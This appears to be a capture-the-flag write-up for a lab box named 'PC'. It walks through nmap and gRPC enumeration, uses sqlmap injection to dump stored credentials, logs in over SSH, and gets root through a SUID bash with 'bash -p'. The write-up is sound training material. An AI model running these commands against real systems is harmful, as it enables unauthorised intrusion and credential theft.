PC
1. Initial recon
1.1. nmap
nmap -p- 10.10.11.214 -Pn
PORT STATE SERVICE
22/tcp open ssh
50051/tcp open unknown
2. user.txt
2.1. gRPC
A google search for port 50051 reveals that this port is generally used for gRPC.
Following this blog post I can start to find out how to enumerate gRPC.
Using grpcurl we can see that there is a service called SimpleApp running
./grpcurl --plaintext 10.10.11.214:50051 list
SimpleApp
grpc.reflection.v1alpha.ServerReflection
and that the app has 3 pages.
./grpcurl --plaintext 10.10.11.214:50051 list SimpleApp
SimpleApp.LoginUser
SimpleApp.RegisterUser
SimpleApp.getInfo
now let's use grpcui to have a web ui for the application
./grpcui -plaintext 10.10.11.214:50051
gRPC Web UI available at http://127.0.0.1:36185/
If we try to use the getInfo option we get the following output
{
"message": "Authorization Error.Missing 'token' header"
}
so, we may need to use the RegisterUser and then LoginUser functions to get our token
if we try to make a user with the name admin
we get an error saying that the user already exists, however, we can use the credentials admin:admin
with the LoginUser function and generate a token. taking note of the id and token we are given, let's use them with the getInfo function and see what we get
{
"message": "Will update soon."
}
let's try some other numbers like, 1
Unexpected <class 'TypeError'>: 'NoneType' object is not subscriptable
time to do some research
2.2. SQLmap
This medium article talks about how SQLi might be a vulnerability when dealing with gRPC, so let's capture a request to a call to the getInfo function using BurpSuite and see if sqlmap can do anything for us.
sqlmap -r req.txt -dbs --batch
[INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[WARNING] on SQLite it is not possible to enumerate databases (use only '--tables')
sqlmap -r req.txt --tables --batch
[INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[INFO] fetching tables for database: 'SQLite_masterdb'
<current>
[2 tables]
+----------+
| accounts |
| messages |
+----------+
sqlmap -r req.txt -T accounts --batch --dump
Table: accounts
[2 entries]
+------------------------+----------+
| password | username |
+------------------------+----------+
| admin | admin |
| HereIsYourPassWord1431 | sau |
+------------------------+----------+
We can use the credentials sau:HereIsYourPassWord1431
to ssh into the machine for the user flag
3. root.txt
Running a command to check for SUID binaries: find / -type f -perm -04000 -ls 2>/dev/null
we can see that bash
is there. so simply run /usr/bin/bash -p
for root!
Was this helpful?